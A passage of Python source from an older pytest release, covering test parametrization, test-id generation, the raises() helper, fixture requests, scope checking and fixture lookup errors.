        self._arg2scopenum = {} # used for sorting parametrized resources
        self.keywords = {}
        self.indices = {}
    def copy(self, metafunc):
        # shallow-copy so further parametrize() calls can extend this spec
        cs = CallSpec2(self.metafunc)
        cs.funcargs.update(self.funcargs)
        cs.params.update(self.params)
        cs.keywords.update(self.keywords)
        cs.indices.update(self.indices)
        cs._arg2scopenum.update(self._arg2scopenum)
        cs._idlist = list(self._idlist)
        cs._globalid = self._globalid
        cs._globalid_args = self._globalid_args
        cs._globalparam = self._globalparam
        return cs
    def _checkargnotcontained(self, arg):
        if arg in self.params or arg in self.funcargs:
            raise ValueError("duplicate %r" %(arg,))
    def getparam(self, name):
        try:
            return self.params[name]
        except KeyError:
            if self._globalparam is _notexists:
                raise ValueError(name)
            return self._globalparam
    @property
    def id(self):
        # joined test id, e.g. "3-sqrt"; falsy fragments are skipped
        return "-".join(map(str, filter(None, self._idlist)))
    def setmulti(self, valtypes, argnames, valset, id, keywords, scopenum,
                 param_index):
        # record one value set from parametrize(); valtypes maps each
        # argname to "params" (indirect) or "funcargs" (direct)
        for arg,val in zip(argnames, valset):
            self._checkargnotcontained(arg)
            valtype_for_arg = valtypes[arg]
            getattr(self, valtype_for_arg)[arg] = val
            self.indices[arg] = param_index
            self._arg2scopenum[arg] = scopenum
            if val is _notexists:
                # empty parameter set: Function.setup() will skip the test
                self._emptyparamspecified = True
        self._idlist.append(id)
        self.keywords.update(keywords)
    def setall(self, funcargs, id, param):
        # record one call from the deprecated addcall() API
        for x in funcargs:
            self._checkargnotcontained(x)
        self.funcargs.update(funcargs)
        if id is not _notexists:
            self._idlist.append(id)
        if param is not _notexists:
            assert self._globalparam is _notexists
            self._globalparam = param
        for arg in funcargs:
            self._arg2scopenum[arg] = scopenum_function
class FuncargnamesCompatAttr:
    """Mixin providing the deprecated ``funcargnames`` alias.

    Metafunc, Function and FixtureRequest all inherit this so that none
    of them has to define the pre-2.3 compatibility attribute itself.
    """
    funcargnames = property(
        lambda self: self.fixturenames,
        doc="alias attribute for ``fixturenames`` for pre-2.3 compatibility")
class Metafunc(FuncargnamesCompatAttr):
    """
    Metafunc objects are passed to the ``pytest_generate_tests`` hook.
    They help to inspect a test function and to generate tests according to
    test configuration or values specified in the class or module where a
    test function is defined.
    :ivar fixturenames: set of fixture names required by the test function
    :ivar function: underlying python test function
    :ivar cls: class object where the test function is defined in or ``None``.
    :ivar module: the module object where the test function is defined in.
    :ivar config: access to the :class:`_pytest.config.Config` object for the
        test session.
    :ivar funcargnames:
        .. deprecated:: 2.3
            Use ``fixturenames`` instead.
    """
    def __init__(self, function, fixtureinfo, config, cls=None, module=None):
        self.config = config
        self.module = module
        self.function = function
        self.fixturenames = fixtureinfo.names_closure
        self._arg2fixturedefs = fixtureinfo.name2fixturedefs
        self.cls = cls
        self._calls = []
        self._ids = py.builtin.set()
    def parametrize(self, argnames, argvalues, indirect=False, ids=None,
                    scope=None):
        """ Add new invocations to the underlying test function using the list
        of argvalues for the given argnames. Parametrization is performed
        during the collection phase. If you need to setup expensive resources
        see about setting indirect to do it rather at test setup time.
        :arg argnames: a comma-separated string denoting one or more argument
            names, or a list/tuple of argument strings.
        :arg argvalues: The list of argvalues determines how often a
            test is invoked with different argument values. If only one
            argname was specified argvalues is a list of simple values. If N
            argnames were specified, argvalues must be a list of N-tuples,
            where each tuple-element specifies a value for its respective
            argname.
        :arg indirect: The list of argnames or boolean. A list of arguments'
            names (subset of argnames). If True the list contains all names from
            the argnames. Each argvalue corresponding to an argname in this list will
            be passed as request.param to its respective argname fixture
            function so that it can perform more expensive setups during the
            setup phase of a test rather than at collection time.
        :arg ids: list of string ids, or a callable.
            If strings, each is corresponding to the argvalues so that they are
            part of the test id.
            If callable, it should take one argument (a single argvalue) and return
            a string or return None. If None, the automatically generated id for that
            argument will be used.
            If no ids are provided they will be generated automatically from
            the argvalues.
        :arg scope: if specified it denotes the scope of the parameters.
            The scope is used for grouping tests by parameter instances.
            It will also override any fixture-function defined scope, allowing
            to set a dynamic scope using test context or configuration.
        """
        # individual parametrized argument sets can be wrapped in a series
        # of markers in which case we unwrap the values and apply the mark
        # at Function init
        newkeywords = {}
        unwrapped_argvalues = []
        for i, argval in enumerate(argvalues):
            while isinstance(argval, MarkDecorator):
                newmark = MarkDecorator(argval.markname,
                                        argval.args[:-1], argval.kwargs)
                newmarks = newkeywords.setdefault(i, {})
                newmarks[newmark.markname] = newmark
                argval = argval.args[-1]
            unwrapped_argvalues.append(argval)
        argvalues = unwrapped_argvalues
        if not isinstance(argnames, (tuple, list)):
            # split a comma-separated argnames string into a list
            argnames = [x.strip() for x in argnames.split(",") if x.strip()]
            if len(argnames) == 1:
                # normalize single-name values into 1-tuples
                argvalues = [(val,) for val in argvalues]
        if not argvalues:
            # empty parameter list: create a single "empty" call which will
            # later be reported as a skip (see CallSpec2.setmulti)
            argvalues = [(_notexists,) * len(argnames)]
        if scope is None:
            scope = "function"
        scopenum = scopes.index(scope)
        valtypes = {}
        for arg in argnames:
            if arg not in self.fixturenames:
                raise ValueError("%r uses no fixture %r" %(self.function, arg))
        # decide, per argname, whether values go to params (indirect) or
        # funcargs (direct)
        if indirect is True:
            valtypes = dict.fromkeys(argnames, "params")
        elif indirect is False:
            valtypes = dict.fromkeys(argnames, "funcargs")
        elif isinstance(indirect, (tuple, list)):
            valtypes = dict.fromkeys(argnames, "funcargs")
            for arg in indirect:
                if arg not in argnames:
                    raise ValueError("indirect given to %r: fixture %r doesn't exist" %(
                        self.function, arg))
                valtypes[arg] = "params"
        idfn = None
        if callable(ids):
            idfn = ids
            ids = None
        if ids and len(ids) != len(argvalues):
            raise ValueError('%d tests specified with %d ids' %(
                len(argvalues), len(ids)))
        if not ids:
            ids = idmaker(argnames, argvalues, idfn)
        # cross-multiply the new value sets with every already-existing call
        newcalls = []
        for callspec in self._calls or [CallSpec2(self)]:
            for param_index, valset in enumerate(argvalues):
                assert len(valset) == len(argnames)
                newcallspec = callspec.copy(self)
                newcallspec.setmulti(valtypes, argnames, valset, ids[param_index],
                                     newkeywords.get(param_index, {}), scopenum,
                                     param_index)
                newcalls.append(newcallspec)
        self._calls = newcalls
    def addcall(self, funcargs=None, id=_notexists, param=_notexists):
        """ (deprecated, use parametrize) Add a new call to the underlying
        test function during the collection phase of a test run. Note that
        request.addcall() is called during the test collection phase prior and
        independently to actual test execution. You should only use addcall()
        if you need to specify multiple arguments of a test function.
        :arg funcargs: argument keyword dictionary used when invoking
            the test function.
        :arg id: used for reporting and identification purposes. If you
            don't supply an `id` an automatic unique id will be generated.
        :arg param: a parameter which will be exposed to a later fixture function
            invocation through the ``request.param`` attribute.
        """
        assert funcargs is None or isinstance(funcargs, dict)
        if funcargs is not None:
            for name in funcargs:
                if name not in self.fixturenames:
                    pytest.fail("funcarg %r not used in this function." % name)
        else:
            funcargs = {}
        if id is None:
            raise ValueError("id=None not allowed")
        if id is _notexists:
            # default id: the call's index in the list of calls
            id = len(self._calls)
        id = str(id)
        if id in self._ids:
            raise ValueError("duplicate id %r" % id)
        self._ids.add(id)
        cs = CallSpec2(self)
        cs.setall(funcargs, id, param)
        self._calls.append(cs)
def _idval(val, argname, idx, idfn):
    """Return the id string for one parametrized value.

    Tries the user-provided *idfn* first, then type-specific defaults,
    and finally falls back to "<argname><idx>".
    """
    if idfn:
        # user callable; any exception silently falls back to the defaults
        try:
            generated = idfn(val)
            if generated:
                return generated
        except Exception:
            pass
    if isinstance(val, (float, int, str, bool, NoneType)):
        return str(val)
    if isinstance(val, REGEX_TYPE):
        return val.pattern
    if enum is not None and isinstance(val, enum.Enum):
        return str(val)
    if isclass(val) and hasattr(val, '__name__'):
        return val.__name__
    # opaque object: use argument name plus positional index
    return str(argname) + str(idx)
def _idvalset(idx, valset, argnames, idfn):
    """Join the per-argument ids of one value set with dashes."""
    parts = [_idval(val, argname, idx, idfn)
             for val, argname in zip(valset, argnames)]
    return "-".join(parts)
def idmaker(argnames, argvalues, idfn=None):
    """Build the list of test ids for all parametrize value sets."""
    ids = [_idvalset(index, valset, argnames, idfn)
           for index, valset in enumerate(argvalues)]
    if len(set(ids)) < len(ids):
        # user may have provided a bad idfn which means the ids are not unique
        ids = ["%d%s" % (i, testid) for i, testid in enumerate(ids)]
    return ids
def showfixtures(config):
    """Run a collection-only session and print all available fixtures."""
    from _pytest.main import wrap_session
    return wrap_session(config, _showfixtures_main)
def _showfixtures_main(config, session):
    """Implementation behind ``pytest --fixtures``: print every available
    fixture, grouped by the module that defines it."""
    import _pytest.config
    session.perform_collect()
    curdir = py.path.local()
    tw = _pytest.config.create_terminal_writer(config)
    verbose = config.getvalue("verbose")
    fm = session._fixturemanager
    available = []
    for argname, fixturedefs in fm._arg2fixturedefs.items():
        assert fixturedefs is not None
        if not fixturedefs:
            continue
        # the last registered definition wins (it shadows earlier ones)
        fixturedef = fixturedefs[-1]
        loc = getlocation(fixturedef.func, curdir)
        available.append((len(fixturedef.baseid),
                          fixturedef.func.__module__,
                          curdir.bestrelpath(loc),
                          fixturedef.argname, fixturedef))
    # sorting by (baseid length, module, ...) groups fixtures per module
    available.sort()
    currentmodule = None
    for baseid, module, bestrel, argname, fixturedef in available:
        if currentmodule != module:
            if not module.startswith("_pytest."):
                tw.line()
                tw.sep("-", "fixtures defined from %s" %(module,))
                currentmodule = module
        if verbose <= 0 and argname[0] == "_":
            # private fixtures are hidden unless -v was given
            continue
        if verbose > 0:
            funcargspec = "%s -- %s" %(argname, bestrel,)
        else:
            funcargspec = argname
        tw.line(funcargspec, green=True)
        loc = getlocation(fixturedef.func, curdir)
        doc = fixturedef.func.__doc__ or ""
        if doc:
            for line in doc.strip().split("\n"):
                tw.line("    " + line.strip())
        else:
            tw.line("    %s: no docstring available" %(loc,),
                red=True)
def getlocation(function, curdir):
    """Return "path:lineno" for *function*, relative to *curdir* when
    possible (lineno is 1-based)."""
    import inspect
    path = py.path.local(inspect.getfile(function))
    if path.relto(curdir):
        path = path.relto(curdir)
    lineno = py.builtin._getcode(function).co_firstlineno
    return "%s:%d" % (path, lineno + 1)
def raises(expected_exception, *args, **kwargs):
    """ assert that a code block/function call raises @expected_exception
    and raise a failure exception otherwise.
    This helper produces a ``py.code.ExceptionInfo()`` object.
    If using Python 2.5 or above, you may use this function as a
    context manager::
        >>> with raises(ZeroDivisionError):
        ...    1/0
    Or you can specify a callable by passing a to-be-called lambda::
        >>> raises(ZeroDivisionError, lambda: 1/0)
        <ExceptionInfo ...>
    or you can specify an arbitrary callable with arguments::
        >>> def f(x): return 1/x
        ...
        >>> raises(ZeroDivisionError, f, 0)
        <ExceptionInfo ...>
        >>> raises(ZeroDivisionError, f, x=0)
        <ExceptionInfo ...>
    A third possibility is to use a string to be executed::
        >>> raises(ZeroDivisionError, "f(0)")
        <ExceptionInfo ...>
    Performance note:
    -----------------
    Similar to caught exception objects in Python, explicitly clearing
    local references to returned ``py.code.ExceptionInfo`` objects can
    help the Python interpreter speed up its garbage collection.
    Clearing those references breaks a reference cycle
    (``ExceptionInfo`` --> caught exception --> frame stack raising
    the exception --> current frame stack --> local variables -->
    ``ExceptionInfo``) which makes Python keep all objects referenced
    from that cycle (including all local variables in the current
    frame) alive until the next cyclic garbage collection run. See the
    official Python ``try`` statement documentation for more detailed
    information.
    """
    __tracebackhide__ = True
    if expected_exception is AssertionError:
        # we want to catch a AssertionError
        # replace our subclass with the builtin one
        # see https://github.com/pytest-dev/pytest/issues/176
        from _pytest.assertion.util import BuiltinAssertionError \
            as expected_exception
    msg = ("exceptions must be old-style classes or"
           " derived from BaseException, not %s")
    if isinstance(expected_exception, tuple):
        for exc in expected_exception:
            if not isclass(exc):
                raise TypeError(msg % type(exc))
    elif not isclass(expected_exception):
        raise TypeError(msg % type(expected_exception))
    if not args:
        # context-manager form: ``with raises(Exc): ...``
        return RaisesContext(expected_exception)
    elif isinstance(args[0], str):
        # string form: compile and exec the code in the caller's namespace
        code, = args
        assert isinstance(code, str)
        frame = sys._getframe(1)
        loc = frame.f_locals.copy()
        loc.update(kwargs)
        #print "raises frame scope: %r" % frame.f_locals
        try:
            code  = py.code.Source(code).compile()
            py.builtin.exec_(code, frame.f_globals, loc)
            # XXX didn'T mean f_globals == f_locals something special?
            # this is destroyed here ...
        except expected_exception:
            return py.code.ExceptionInfo()
    else:
        # callable form: invoke args[0] with the remaining args/kwargs
        func = args[0]
        try:
            func(*args[1:], **kwargs)
        except expected_exception:
            return py.code.ExceptionInfo()
    # reaching this point means no expected exception was raised
    pytest.fail("DID NOT RAISE")
class RaisesContext(object):
    # Context manager returned by raises() when used in with-statement form.
    def __init__(self, expected_exception):
        self.expected_exception = expected_exception
        self.excinfo = None
    def __enter__(self):
        # hand out an uninitialized ExceptionInfo now; it gets filled in
        # __exit__ once the exception (if any) is known
        self.excinfo = object.__new__(py.code.ExceptionInfo)
        return self.excinfo
    def __exit__(self, *tp):
        __tracebackhide__ = True
        if tp[0] is None:
            pytest.fail("DID NOT RAISE")
        if sys.version_info < (2, 7):
            # py26: on __exit__() exc_value often does not contain the
            # exception value.
            # http://bugs.python.org/issue7853
            if not isinstance(tp[1], BaseException):
                exc_type, value, traceback = tp
                tp = exc_type, exc_type(value), traceback
        self.excinfo.__init__(tp)
        # returning True suppresses the exception when it is the expected one
        return issubclass(self.excinfo.type, self.expected_exception)
class Function(FunctionMixin, pytest.Item, FuncargnamesCompatAttr):
    """ a Function Item is responsible for setting up and executing a
    Python test function.
    """
    _genid = None
    def __init__(self, name, parent, args=None, config=None,
                 callspec=None, callobj=NOTSET, keywords=None, session=None,
                 fixtureinfo=None):
        super(Function, self).__init__(name, parent, config=config,
                                       session=session)
        # args is only set for deprecated yield-generated tests
        self._args = args
        if callobj is not NOTSET:
            self.obj = callobj
        # marks applied to the function become item keywords
        self.keywords.update(self.obj.__dict__)
        if callspec:
            self.callspec = callspec
            self.keywords.update(callspec.keywords)
        if keywords:
            self.keywords.update(keywords)
        if fixtureinfo is None:
            fixtureinfo = self.session._fixturemanager.getfixtureinfo(
                self.parent, self.obj, self.cls,
                funcargs=not self._isyieldedfunction())
        self._fixtureinfo = fixtureinfo
        self.fixturenames = fixtureinfo.names_closure
        self._initrequest()
    def _initrequest(self):
        self.funcargs = {}
        if self._isyieldedfunction():
            assert not hasattr(self, "callspec"), (
                "yielded functions (deprecated) cannot have funcargs")
        else:
            if hasattr(self, "callspec"):
                callspec = self.callspec
                assert not callspec.funcargs
                self._genid = callspec.id
                if hasattr(callspec, "param"):
                    self.param = callspec.param
        self._request = FixtureRequest(self)
    @property
    def function(self):
        "underlying python 'function' object"
        return getattr(self.obj, 'im_func', self.obj)
    def _getobj(self):
        name = self.name
        i = name.find("[") # parametrization
        if i != -1:
            # strip the "[...]" id suffix to find the real attribute name
            name = name[:i]
        return getattr(self.parent.obj, name)
    @property
    def _pyfuncitem(self):
        "(compatonly) for code expecting pytest-2.2 style request objects"
        return self
    def _isyieldedfunction(self):
        return getattr(self, "_args", None) is not None
    def runtest(self):
        """ execute the underlying test function. """
        self.ihook.pytest_pyfunc_call(pyfuncitem=self)
    def setup(self):
        # check if parametrization happend with an empty list
        try:
            self.callspec._emptyparamspecified
        except AttributeError:
            pass
        else:
            fs, lineno = self._getfslineno()
            pytest.skip("got empty parameter set, function %s at %s:%d" %(
                self.function.__name__, fs, lineno))
        super(Function, self).setup()
        fillfixtures(self)
# Maps each request scope to the FixtureRequest properties that are
# legal to access in it; each narrower scope inherits every property
# of the enclosing wider scope.
scope2props = {
    "session": (),
    "module": ("fspath", "module"),
    "class": ("fspath", "module", "cls"),
    "instance": ("fspath", "module", "cls", "instance"),
    "function": ("fspath", "module", "cls", "instance",
                 "function", "keywords"),
}
def scopeproperty(name=None, doc=None):
    """Return a decorator that turns a method into a scope-guarded property.

    The resulting property only yields a value when the requesting
    object's scope (see ``scope2props``) allows access; otherwise an
    AttributeError naming the property and scope is raised.
    """
    def decoratescope(func):
        scopename = name or func.__name__
        def provide(self):
            allowed = scope2props[self.scope]
            if func.__name__ not in allowed:
                raise AttributeError("%s not available in %s-scoped context" % (
                    scopename, self.scope))
            return func(self)
        return property(provide, None, None, func.__doc__)
    return decoratescope
class FixtureRequest(FuncargnamesCompatAttr):
    """ A request for a fixture from a test or fixture function.
    A request object gives access to the requesting test context
    and has an optional ``param`` attribute in case
    the fixture is parametrized indirectly.
    """
    def __init__(self, pyfuncitem):
        self._pyfuncitem = pyfuncitem
        #: fixture for which this request is being performed
        self.fixturename = None
        #: Scope string, one of "function", "cls", "module", "session"
        self.scope = "function"
        # cache of already-computed fixture values, keyed by argname
        self._funcargs = {}
        # cache of resolved FixtureDef objects, keyed by argname
        self._fixturedefs = {}
        fixtureinfo = pyfuncitem._fixtureinfo
        self._arg2fixturedefs = fixtureinfo.name2fixturedefs.copy()
        # per-argname override depth, see _getnextfixturedef
        self._arg2index = {}
        self.fixturenames = fixtureinfo.names_closure
        self._fixturemanager = pyfuncitem.session._fixturemanager
    @property
    def node(self):
        """ underlying collection node (depends on current request scope)"""
        return self._getscopeitem(self.scope)
    def _getnextfixturedef(self, argname):
        fixturedefs = self._arg2fixturedefs.get(argname, None)
        if fixturedefs is None:
            # we arrive here because of a a dynamic call to
            # getfuncargvalue(argname) usage which was naturally
            # not known at parsing/collection time
            fixturedefs = self._fixturemanager.getfixturedefs(
                argname, self._pyfuncitem.parent.nodeid)
            self._arg2fixturedefs[argname] = fixturedefs
        # fixturedefs list is immutable so we maintain a decreasing index
        # (-1 is the most specific definition; each repeated lookup walks
        # one step toward the more general overridden definitions)
        index = self._arg2index.get(argname, 0) - 1
        if fixturedefs is None or (-index > len(fixturedefs)):
            raise FixtureLookupError(argname, self)
        self._arg2index[argname] = index
        return fixturedefs[index]
    @property
    def config(self):
        """ the pytest config object associated with this request. """
        return self._pyfuncitem.config
    @scopeproperty()
    def function(self):
        """ test function object if the request has a per-function scope. """
        return self._pyfuncitem.obj
    @scopeproperty("class")
    def cls(self):
        """ class (can be None) where the test function was collected. """
        clscol = self._pyfuncitem.getparent(pytest.Class)
        if clscol:
            return clscol.obj
    @property
    def instance(self):
        """ instance (can be None) on which test function was collected. """
        # unittest support hack, see _pytest.unittest.TestCaseFunction
        try:
            return self._pyfuncitem._testcase
        except AttributeError:
            function = getattr(self, "function", None)
            if function is not None:
                return py.builtin._getimself(function)
    @scopeproperty()
    def module(self):
        """ python module object where the test function was collected. """
        return self._pyfuncitem.getparent(pytest.Module).obj
    @scopeproperty()
    def fspath(self):
        """ the file system path of the test module which collected this test. """
        return self._pyfuncitem.fspath
    @property
    def keywords(self):
        """ keywords/markers dictionary for the underlying node. """
        return self.node.keywords
    @property
    def session(self):
        """ pytest session object. """
        return self._pyfuncitem.session
    def addfinalizer(self, finalizer):
        """ add finalizer/teardown function to be called after the
        last test within the requesting test context finished
        execution. """
        # XXX usually this method is shadowed by fixturedef specific ones
        self._addfinalizer(finalizer, scope=self.scope)
    def _addfinalizer(self, finalizer, scope):
        # register the finalizer against the collection node owning *scope*
        colitem = self._getscopeitem(scope)
        self._pyfuncitem.session._setupstate.addfinalizer(
            finalizer=finalizer, colitem=colitem)
    def applymarker(self, marker):
        """ Apply a marker to a single test function invocation.
        This method is useful if you don't want to have a keyword/marker
        on all function invocations.
        :arg marker: a :py:class:`_pytest.mark.MarkDecorator` object
            created by a call to ``pytest.mark.NAME(...)``.
        """
        try:
            self.node.keywords[marker.markname] = marker
        except AttributeError:
            raise ValueError(marker)
    def raiseerror(self, msg):
        """ raise a FixtureLookupError with the given message. """
        raise self._fixturemanager.FixtureLookupError(None, self, msg)
    def _fillfixtures(self):
        # resolve every not-yet-filled fixture value for the item
        item = self._pyfuncitem
        fixturenames = getattr(item, "fixturenames", self.fixturenames)
        for argname in fixturenames:
            if argname not in item.funcargs:
                item.funcargs[argname] = self.getfuncargvalue(argname)
    def cached_setup(self, setup, teardown=None, scope="module", extrakey=None):
        """ (deprecated) Return a testing resource managed by ``setup`` &
        ``teardown`` calls.  ``scope`` and ``extrakey`` determine when the
        ``teardown`` function will be called so that subsequent calls to
        ``setup`` would recreate the resource.  With pytest-2.3 you often
        do not need ``cached_setup()`` as you can directly declare a scope
        on a fixture function and register a finalizer through
        ``request.addfinalizer()``.
        :arg teardown: function receiving a previously setup resource.
        :arg setup: a no-argument function creating a resource.
        :arg scope: a string value out of ``function``, ``class``, ``module``
            or ``session`` indicating the caching lifecycle of the resource.
        :arg extrakey: added to internal caching key of (funcargname, scope).
        """
        if not hasattr(self.config, '_setupcache'):
            self.config._setupcache = {} # XXX weakref?
        cachekey = (self.fixturename, self._getscopeitem(scope), extrakey)
        cache = self.config._setupcache
        try:
            val = cache[cachekey]
        except KeyError:
            self._check_scope(self.fixturename, self.scope, scope)
            val = setup()
            cache[cachekey] = val
            if teardown is not None:
                def finalizer():
                    del cache[cachekey]
                    teardown(val)
                self._addfinalizer(finalizer, scope=scope)
        return val
    def getfuncargvalue(self, argname):
        """ Dynamically retrieve a named fixture function argument.
        As of pytest-2.3, it is easier and usually better to access other
        fixture values by stating it as an input argument in the fixture
        function.  If you only can decide about using another fixture at test
        setup time, you may use this function to retrieve it inside a fixture
        function body.
        """
        return self._get_active_fixturedef(argname).cached_result[0]
    def _get_active_fixturedef(self, argname):
        try:
            return self._fixturedefs[argname]
        except KeyError:
            try:
                fixturedef = self._getnextfixturedef(argname)
            except FixtureLookupError:
                if argname == "request":
                    # "request" is always available even without an
                    # explicit fixture definition; fake a FixtureDef
                    # whose cached result is this request object itself
                    class PseudoFixtureDef:
                        cached_result = (self, [0], None)
                        scope = "function"
                    return PseudoFixtureDef
                raise
        # remove indent to prevent the python3 exception
        # from leaking into the call
        result = self._getfuncargvalue(fixturedef)
        self._funcargs[argname] = result
        self._fixturedefs[argname] = fixturedef
        return fixturedef
    def _get_fixturestack(self):
        # walk the chain of SubRequests, collecting the FixtureDefs
        # from outermost to innermost
        current = self
        l = []
        while 1:
            fixturedef = getattr(current, "_fixturedef", None)
            if fixturedef is None:
                l.reverse()
                return l
            l.append(fixturedef)
            current = current._parent_request
    def _getfuncargvalue(self, fixturedef):
        # prepare a subrequest object before calling fixture function
        # (latter managed by fixturedef)
        argname = fixturedef.argname
        funcitem = self._pyfuncitem
        scope = fixturedef.scope
        try:
            param = funcitem.callspec.getparam(argname)
        except (AttributeError, ValueError):
            param = NOTSET
            param_index = 0
        else:
            # indices might not be set if old-style metafunc.addcall() was used
            param_index = funcitem.callspec.indices.get(argname, 0)
            # if a parametrize invocation set a scope it will override
            # the static scope defined with the fixture function
            paramscopenum = funcitem.callspec._arg2scopenum.get(argname)
            if paramscopenum is not None:
                scope = scopes[paramscopenum]
        subrequest = SubRequest(self, scope, param, param_index, fixturedef)
        # check if a higher-level scoped fixture accesses a lower level one
        subrequest._check_scope(argname, self.scope, scope)
        # clear sys.exc_info before invoking the fixture (python bug?)
        # if its not explicitly cleared it will leak into the call
        exc_clear()
        try:
            # call the fixture function
            val = fixturedef.execute(request=subrequest)
        finally:
            # if fixture function failed it might have registered finalizers
            self.session._setupstate.addfinalizer(fixturedef.finish,
                                                  subrequest.node)
        return val
    def _check_scope(self, argname, invoking_scope, requested_scope):
        if argname == "request":
            return
        if scopemismatch(invoking_scope, requested_scope):
            # try to report something helpful
            lines = self._factorytraceback()
            pytest.fail("ScopeMismatch: You tried to access the %r scoped "
                "fixture %r with a %r scoped request object, "
                "involved factories\n%s" %(
                (requested_scope, argname, invoking_scope, "\n".join(lines))),
                pytrace=False)
    def _factorytraceback(self):
        # build "path:lineno: def name(args)" lines for the fixture stack
        lines = []
        for fixturedef in self._get_fixturestack():
            factory = fixturedef.func
            fs, lineno = getfslineno(factory)
            p = self._pyfuncitem.session.fspath.bestrelpath(fs)
            args = inspect.formatargspec(*inspect.getargspec(factory))
            lines.append("%s:%d: def %s%s" %(
                p, lineno, factory.__name__, args))
        return lines
    def _getscopeitem(self, scope):
        if scope == "function":
            # this might also be a non-function Item despite its attribute name
            return self._pyfuncitem
        node = get_scope_node(self._pyfuncitem, scope)
        if node is None and scope == "class":
            # fallback to function item itself
            node = self._pyfuncitem
        assert node
        return node
    def __repr__(self):
        return "<FixtureRequest for %r>" %(self.node)
class SubRequest(FixtureRequest):
    """ a sub request for handling getting a fixture from a
    test function/fixture. """
    def __init__(self, request, scope, param, param_index, fixturedef):
        # note: FixtureRequest.__init__ is deliberately not called; all
        # relevant state is copied from the parent request instead
        self._parent_request = request
        self.fixturename = fixturedef.argname
        if param is not NOTSET:
            self.param = param
        self.param_index = param_index
        self.scope = scope
        self._fixturedef = fixturedef
        # finalizers registered through this request attach to the
        # fixture definition rather than to the request's scope node
        self.addfinalizer = fixturedef.addfinalizer
        self._pyfuncitem = request._pyfuncitem
        self._funcargs = request._funcargs
        self._fixturedefs = request._fixturedefs
        self._arg2fixturedefs = request._arg2fixturedefs
        self._arg2index = request._arg2index
        self.fixturenames = request.fixturenames
        self._fixturemanager = request._fixturemanager
    def __repr__(self):
        return "<SubRequest %r for %r>" % (self.fixturename, self._pyfuncitem)
class ScopeMismatchError(Exception):
    """ A fixture function tries to use a different fixture function
    which has a lower scope (e.g. a Session one calls a function one)
    """
# fixture scopes ordered from widest to narrowest; list position is the
# "scopenum" used throughout the fixture machinery
scopes = ["session", "module", "class", "function"]
scopenum_function = scopes.index("function")
def scopemismatch(currentscope, newscope):
    """Return True if *newscope* is narrower than *currentscope*.

    A wider-scoped (longer-lived) fixture must not depend on a
    narrower-scoped one; scope order is given by the ``scopes`` list.
    """
    current_index = scopes.index(currentscope)
    new_index = scopes.index(newscope)
    return new_index > current_index
class FixtureLookupError(LookupError):
    """ could not return a requested Fixture (missing or invalid). """
    def __init__(self, argname, request, msg=None):
        self.argname = argname
        self.request = request
        self.fixturestack = request._get_fixturestack()
        self.msg = msg
    def formatrepr(self):
        """Build a FixtureLookupErrorRepr with source snippets of the
        requesting test function and every fixture on the stack, plus a
        message listing the available fixtures when none matched."""
        tblines = []
        addline = tblines.append
        stack = [self.request._pyfuncitem.obj]
        stack.extend(map(lambda x: x.func, self.fixturestack))
        msg = self.msg
        if msg is not None:
            stack = stack[:-1] # the last fixture raise an error, let's present
                               # it at the requesting side
        # NOTE(review): if *stack* is empty, fspath/lineno below are never
        # bound and the final FixtureLookupErrorRepr(...) call would raise
        # NameError -- presumably stack always has at least the test item.
        for function in stack:
            fspath, lineno = getfslineno(function)
            try:
                lines, _ = inspect.getsourcelines(get_real_func(function))
            except IOError:
                error_msg = "file %s, line %s: source code not available"
                addline(error_msg % (fspath, lineno+1))
            else:
                addline("file %s, line %s" % (fspath, lineno+1))
                # show the function header only, stopping at the def line
                for i, line in enumerate(lines):
                    line = line.rstrip()
                    addline("  " + line)
                    if line.lstrip().startswith('def'):
                        break
        if msg is None:
            # no explicit message: report which fixtures *are* visible
            # from the requesting test's location
            fm = self.request._fixturemanager
            available = []
            for name, fixturedef in fm._arg2fixturedefs.items():
                parentid = self.request._pyfuncitem.parent.nodeid
                faclist = list(fm._matchfactories(fixturedef, parentid))
                if faclist:
                    available.append(name)
            msg = "fixture %r not found" % (self.argname,)
            msg += "\n available fixtures: %s" %(", ".join(available),)
            msg += "\n use 'py.test --fixtures [testpath]' for help on them."
        return FixtureLookupErrorRepr(fspath, lineno, tblines, msg, self.argname)
class FixtureLookupErrorRepr(TerminalRepr):
    """Terminal representation for a FixtureLookupError: source snippet
    lines followed by the error message in red and the file location."""
    def __init__(self, filename, firstlineno, tblines, errorstring, argname):
        self.tblines = tblines
        self.errorstring = errorstring
        self.filename = filename
        self.firstlineno = firstlineno
        self.argname = argname
    def toterminal(self, tw):
        #tw.line("FixtureLookupError: %s" %(self.argname), red=True)
        for tbline in self.tblines:
            tw.line(tbline.rstrip())
        for line in self.errorstring.split("\n"):
            tw.line("        " + line.strip(), red=True)
        tw.line()
        # lineno is stored 0-based, display 1-based
        tw.line("%s:%d" % (self.filename, self.firstlineno+1))
class FixtureManager:
    """
    pytest fixtures definitions and information is stored and managed
    from this class.
    During collection fm.parsefactories() is called multiple times to parse
    fixture function definitions into FixtureDef objects and internal
    data structures.
    During collection of test functions, metafunc-mechanics instantiate
    a FuncFixtureInfo object which is cached per node/func-name.
    This FuncFixtureInfo object is later retrieved by Function nodes
    which themselves offer a fixturenames attribute.
    The FuncFixtureInfo object holds information about fixtures and FixtureDefs
    relevant for a particular function.  An initial list of fixtures is
    assembled like this:
    - ini-defined usefixtures
    - autouse-marked fixtures along the collection chain up from the function
    - usefixtures markers at module/class/function level
    - test function funcargs
    Subsequently the funcfixtureinfo.fixturenames attribute is computed
    as the closure of the fixtures needed to setup the initial fixtures,
    i. e. fixtures needed by fixture functions themselves are appended
    to the fixturenames list.
    Upon the test-setup phases all fixturenames are instantiated, retrieved
    by a lookup of their FuncFixtureInfo.
    """
    # prefix marking pre-2.3 style fixture functions
    _argprefix = "pytest_funcarg__"
    FixtureLookupError = FixtureLookupError
    FixtureLookupErrorRepr = FixtureLookupErrorRepr
    def __init__(self, session):
        self.session = session
        self.config = session.config
        # argname -> list of FixtureDefs, most general first
        self._arg2fixturedefs = {}
        self._holderobjseen = set()
        self._arg2finish = {}
        # (base nodeid, autouse fixture names) pairs; "" matches everything
        self._nodeid_and_autousenames = [("", self.config.getini("usefixtures"))]
        session.config.pluginmanager.register(self, "funcmanage")
    def getfixtureinfo(self, node, func, cls, funcargs=True):
        """Return a FuncFixtureInfo (argnames, closure, arg->defs) for
        *func* collected under *node*."""
        if funcargs and not hasattr(node, "nofuncargs"):
            if cls is not None:
                # skip the "self" argument for methods
                startindex = 1
            else:
                startindex = None
            argnames = getfuncargnames(func, startindex)
        else:
            argnames = ()
        usefixtures = getattr(func, "usefixtures", None)
        initialnames = argnames
